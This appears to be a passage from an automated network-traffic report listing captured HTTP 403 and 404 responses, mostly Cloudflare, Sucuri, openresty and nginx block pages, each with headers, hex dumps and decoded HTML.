                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Mon, 09 Oct 2023 13:51:05 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:05 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tOuN%2F0TBq9Vdx6xI3Qc2o3b9pOOzdH5DZVd1gRJzMIbfYmqkUQpRdJmXP5P34s3tRlOON2SuQtlVvRekERzV7%2BUeWGEU5LxlKO1iPFOSj9oYq90iudrqLe3Pv1TidmFu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718ab0c762af0-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 09 Oct 2023 13:51:11 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:05 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tE7Z%2BkHk7XVMsd5fmxGJOe3%2BeNLmDIxx9JVZoJVp%2BsxoCul3%2Bs3ykrDgISXipVle8qU7HWe9VOEnD7d6%2FwZ32Ebt7LclZB78Ndlm6YPKNM79O7mb3vHDfSG2mgSBn3zN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718ac2d602af0-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ia%2FRLKd1hkHhtLce0b%2BzIk3ALuvliR%2BcYMWcMwgo9lAXjBDhLlV4Ywv%2BHWwfd0sDbXY430TPRZfZ5g4EHekYVWTd5ZoqtSecC9wY7pVEkaPWb9XeopXSpUIHluoM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718ac4c6c2eed-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="mar
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4759Connection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uQoWXcno1xPJYjXX8jVsgC4xj78Js7yqN342IHhf4aymKETiBGZMfdmFdY0cjL6uheGS1NHa3G%2BeU11i%2FiQJjoGv0kgnehu87A8G%2FPwgGo7hkdURT3ZOdyTqLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718af3f292f03-LAXalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Mon, 09 Oct 2023 13:51:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 11003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:06 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:07 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sPbAwzr7nnspN4kYww%2Fj8pJr9hJEgnU5DZC4mO5dRdVVDq%2BFVXSZ%2FUPM2IGZGWZ10d9DzDTi%2F8f1b2Qit1j51Si24ShV0VzMAjNyLS8FVhyzZ55Zk6KsNlnGdB8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718b53a570fcf-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Mon, 09 Oct 2023 13:51:07 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:51:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xnk1S6X8g2Bh1tKzg%2BAa3uSfBuoC9vflmHkfW3sCKqQvKFsIDqe98lekkx3rfHJP89zHywOpNKV3hUPYh9bzwLTgYTc20B8JrjWzKfYcfCfhmDlQ0sFzW284LKcuxBs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718bb2f7a523f-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B0axBDtejRrzuezEVFePIdFe%2FMPREcO6NpFKPEy7lKmhzfXopv0gklXxX9g%2FIP8Vqur0N6Kab4RdXYuDDoIOjl%2FXdwF0iG77Mnk0xa7k5P%2FjN6fOjMRkSbnKfoGsB5Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813718bd6a782b51-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 